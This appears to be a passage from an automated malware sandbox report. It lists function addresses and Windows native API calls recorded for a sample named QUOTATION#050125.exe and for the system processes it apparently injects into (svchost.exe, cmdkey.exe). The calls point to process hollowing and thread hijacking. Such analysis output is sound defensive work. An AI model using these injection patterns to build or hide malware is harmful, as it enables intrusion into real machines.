Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AA0 NtQueryInformationFile,	2_2_03872AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AC0 NtEnumerateValueKey,	2_2_03872AC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872A10 NtWriteFile,	2_2_03872A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038729D0 NtWaitForSingleObject,	2_2_038729D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038729F0 NtReadFile,	2_2_038729F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FB0 NtSetValueKey,	2_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F00 NtCreateFile,	2_2_03872F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F30 NtOpenDirectoryObject,	2_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E80 NtCreateProcessEx,	2_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EC0 NtQuerySection,	2_2_03872EC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872ED0 NtResumeThread,	2_2_03872ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E00 NtQueueApcThread,	2_2_03872E00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E50 NtCreateSection,	2_2_03872E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DA0 NtReadVirtualMemory,	2_2_03872DA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DC0 NtAdjustPrivilegesToken,	2_2_03872DC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D50 NtWriteVirtualMemory,	2_2_03872D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CD0 NtEnumerateKey,	2_2_03872CD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CF0 NtDelayExecution,	2_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C10 NtOpenProcess,	2_2_03872C10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C20 NtSetInformationFile,	2_2_03872C20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C30 NtMapViewOfSection,	2_2_03872C30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C50 NtUnmapViewOfSection,	2_2_03872C50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038738D0 NtGetContextThread,	2_2_038738D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873C90 NtOpenThread,	2_2_03873C90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873C30 NtOpenProcessToken,	2_2_03873C30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07953771 NtSuspendThread,	2_2_07953771
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07953460 NtSetContextThread,	2_2_07953460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07953A80 NtResumeThread,	2_2_07953A80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002B00 NtQueryValueKey,LdrInitializeThunk,	5_2_03002B00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002B10 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_03002B10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002B80 NtCreateKey,LdrInitializeThunk,	5_2_03002B80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002B90 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_03002B90
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002BC0 NtQueryInformationToken,LdrInitializeThunk,	5_2_03002BC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002A10 NtWriteFile,LdrInitializeThunk,	5_2_03002A10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002A80 NtClose,LdrInitializeThunk,	5_2_03002A80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002AC0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_03002AC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030029F0 NtReadFile,LdrInitializeThunk,	5_2_030029F0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002F00 NtCreateFile,LdrInitializeThunk,	5_2_03002F00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002E50 NtCreateSection,LdrInitializeThunk,	5_2_03002E50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002D10 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03002D10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002C30 NtMapViewOfSection,LdrInitializeThunk,	5_2_03002C30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002CF0 NtDelayExecution,LdrInitializeThunk,	5_2_03002CF0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030034E0 NtCreateMutant,LdrInitializeThunk,	5_2_030034E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03004260 NtSetContextThread,	5_2_03004260
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03004570 NtSuspendThread,	5_2_03004570
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002B20 NtQueryInformationProcess,	5_2_03002B20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002BE0 NtQueryVirtualMemory,	5_2_03002BE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002AA0 NtQueryInformationFile,	5_2_03002AA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030029D0 NtWaitForSingleObject,	5_2_030029D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002F30 NtOpenDirectoryObject,	5_2_03002F30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002FB0 NtSetValueKey,	5_2_03002FB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002E00 NtQueueApcThread,	5_2_03002E00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002E80 NtCreateProcessEx,	5_2_03002E80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002EB0 NtProtectVirtualMemory,	5_2_03002EB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002EC0 NtQuerySection,	5_2_03002EC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002ED0 NtResumeThread,	5_2_03002ED0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002D50 NtWriteVirtualMemory,	5_2_03002D50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002DA0 NtReadVirtualMemory,	5_2_03002DA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002DC0 NtAdjustPrivilegesToken,	5_2_03002DC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002C10 NtOpenProcess,	5_2_03002C10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002C20 NtSetInformationFile,	5_2_03002C20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002C50 NtUnmapViewOfSection,	5_2_03002C50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03002CD0 NtEnumerateKey,	5_2_03002CD0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_030038D0 NtGetContextThread,	5_2_030038D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03003C30 NtOpenProcessToken,	5_2_03003C30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03003C90 NtOpenThread,	5_2_03003C90
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EEEF38 NtQueryInformationProcess,NtReadVirtualMemory,	5_2_02EEEF38
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EF3778 NtSuspendThread,	5_2_02EF3778
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EF448D NtMapViewOfSection,	5_2_02EF448D
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EF3468 NtSetContextThread,	5_2_02EF3468
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EF3A88 NtResumeThread,	5_2_02EF3A88
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EF4848 NtUnmapViewOfSection,	5_2_02EF4848
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EEF800 NtMapViewOfSection,	5_2_02EEF800
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02EF3D98 NtQueueApcThread,	5_2_02EF3D98

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004ED5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_004ED5EB

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_004E1201

Source: C:\Users\user\Desktop\QUOTATION#050125.exe

Code function: 0_2_004EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004EE8F6

Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_0048BF40	0_2_0048BF40
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004F2046	0_2_004F2046
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_00488060	0_2_00488060
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004E8298	0_2_004E8298
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004BE4FF	0_2_004BE4FF
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004B676B	0_2_004B676B
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_00514873	0_2_00514873
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_0048CAF0	0_2_0048CAF0
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004ACAA0	0_2_004ACAA0
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_0049CC39	0_2_0049CC39
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004B6DD9	0_2_004B6DD9
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_0049B119	0_2_0049B119
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004891C0	0_2_004891C0
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A1394	0_2_004A1394
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A1706	0_2_004A1706
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A781B	0_2_004A781B
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_0049997D	0_2_0049997D
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A19B0	0_2_004A19B0
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A7A4A	0_2_004A7A4A
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A1C77	0_2_004A1C77
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A7CA7	0_2_004A7CA7
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_0050BE44	0_2_0050BE44
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004B9EEE	0_2_004B9EEE
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_004A1F32	0_2_004A1F32
Source: C:\Users\user\Desktop\QUOTATION#050125.exe	Code function: 0_2_01B2A050	0_2_01B2A050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418943	2_2_00418943
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F053	2_2_0042F053
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004030D0	2_2_004030D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004100FA	2_2_004100FA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410103	2_2_00410103
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004012C0	2_2_004012C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416B40	2_2_00416B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416B43	2_2_00416B43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410323	2_2_00410323
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E323	2_2_0040E323
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E467	2_2_0040E467
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E473	2_2_0040E473
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402780	2_2_00402780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E310	2_2_0384E310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390010E	2_2_0390010E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038300A0	2_2_038300A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EE076	2_2_038EE076
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F6757	2_2_038F6757
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384A760	2_2_0384A760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03842760	2_2_03842760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840680	2_2_03840680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA6C0	2_2_038FA6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C6E0	2_2_0383C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C600	2_2_0385C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864670	2_2_03864670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390A526	2_2_0390A526
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840445	2_2_03840445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4BC0	2_2_038B4BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840B10	2_2_03840B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FCA13	2_2_038FCA13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEA5B	2_2_038FEA5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FE9A6	2_2_038FE9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856882	2_2_03856882
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DC89F	2_2_038DC89F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038428C0	2_2_038428C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E810	2_2_0386E810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0835	2_2_038E0835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03826868	2_2_03826868
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEFBF	2_2_038FEFBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03846FE0	2_2_03846FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384CF00	2_2_0384CF00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F0EAD	2_2_038F0EAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832EE8	2_2_03832EE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03882E48	2_2_03882E48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860E50	2_2_03860E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0E6D	2_2_038E0E6D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852DB0	2_2_03852DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383AD00	2_2_0383AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840D69	2_2_03840D69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858CDF	2_2_03858CDF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390ACEB	2_2_0390ACEB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830C12	2_2_03830C12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384AC20	2_2_0384AC20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BEC20	2_2_038BEC20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EEC4C	2_2_038EEC4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F6C69	2_2_038F6C69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEC60	2_2_038FEC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03831380	2_2_03831380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF330	2_2_038FF330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382D2EC	2_2_0382D2EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F124C	2_2_038F124C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038451C0	2_2_038451C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B1E0	2_2_0385B1E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382F113	2_2_0382F113
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DD130	2_2_038DD130
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388717A	2_2_0388717A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387508C	2_2_0387508C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384B0D0	2_2_0384B0D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F70F1	2_2_038F70F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B36EC	2_2_038B36EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF6F6	2_2_038FF6F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DD62C	2_2_038DD62C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038ED646	2_2_038ED646
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF5C9	2_2_038FF5C9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F75C6	2_2_038F75C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AD480	2_2_038AD480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D5490	2_2_038D5490
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D1B80	2_2_038D1B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387DB19	2_2_0387DB19
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFB2E	2_2_038FFB2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFA89	2_2_038FFA89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FAA0	2_2_0385FAA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038859C0	2_2_038859C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B98B2	2_2_038B98B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F18DA	2_2_038F18DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F78F3	2_2_038F78F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03843800	2_2_03843800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849870	2_2_03849870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B870	2_2_0385B870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B5870	2_2_038B5870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF872	2_2_038FF872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F1FC6	2_2_038F1FC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BFF40	2_2_038BFF40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFF63	2_2_038FFF63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03841EB2	2_2_03841EB2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F9ED2	2_2_038F9ED2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849DD0	2_2_03849DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DFDF4	2_2_038DFDF4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFD27	2_2_038FFD27
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7D4C	2_2_038F7D4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D9C98	2_2_038D9C98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C7CE8	2_2_038C7CE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FCE0	2_2_0385FCE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03843C60	2_2_03843C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0794D7D8	2_2_0794D7D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0794E714	2_2_0794E714
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0794E373	2_2_0794E373
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0794E255	2_2_0794E255
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0794CA88	2_2_0794CA88
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4_2_00656255	4_2_00656255
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4_2_00654A88	4_2_00654A88
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4_2_00656373	4_2_00656373
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4_2_00656714	4_2_00656714
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4_2_006557D8	4_2_006557D8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02F92245	5_2_02F92245
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FDE310	5_2_02FDE310
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0309010E	5_2_0309010E
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FC00A0	5_2_02FC00A0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0307E076	5_2_0307E076
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FCC6E0	5_2_02FCC6E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03086757	5_2_03086757
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD0680	5_2_02FD0680
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FF4670	5_2_02FF4670
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FEC600	5_2_02FEC600
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD2760	5_2_02FD2760
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FDA760	5_2_02FDA760
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308A6C0	5_2_0308A6C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0309A526	5_2_0309A526
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD0445	5_2_02FD0445
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03044BC0	5_2_03044BC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308CA13	5_2_0308CA13
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308EA5B	5_2_0308EA5B
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03072AC0	5_2_03072AC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD0B10	5_2_02FD0B10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD28C0	5_2_02FD28C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FE6882	5_2_02FE6882
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FB6868	5_2_02FB6868
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308E9A6	5_2_0308E9A6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FFE810	5_2_02FFE810
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03070835	5_2_03070835
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FCE9A0	5_2_02FCE9A0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0306C89F	5_2_0306C89F
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FC2EE8	5_2_02FC2EE8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FF0E50	5_2_02FF0E50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308EFBF	5_2_0308EFBF
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD6FE0	5_2_02FD6FE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03012E48	5_2_03012E48
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03070E6D	5_2_03070E6D
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03080EAD	5_2_03080EAD
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FDCF00	5_2_02FDCF00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FE8CDF	5_2_02FE8CDF
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FDAC20	5_2_02FDAC20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FC0C12	5_2_02FC0C12
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0304EC20	5_2_0304EC20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0307EC4C	5_2_0307EC4C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FE2DB0	5_2_02FE2DB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_03086C69	5_2_03086C69
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308EC60	5_2_0308EC60
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD0D69	5_2_02FD0D69
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0309ACEB	5_2_0309ACEB
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FCAD00	5_2_02FCAD00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FBD2EC	5_2_02FBD2EC
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308F330	5_2_0308F330
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0308124C	5_2_0308124C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FC1380	5_2_02FC1380
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FDB0D0	5_2_02FDB0D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0306D130	5_2_0306D130
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0301717A	5_2_0301717A
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FEB1E0	5_2_02FEB1E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FD51C0	5_2_02FD51C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_0300508C	5_2_0300508C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 5_2_02FBF113	5_2_02FBF113
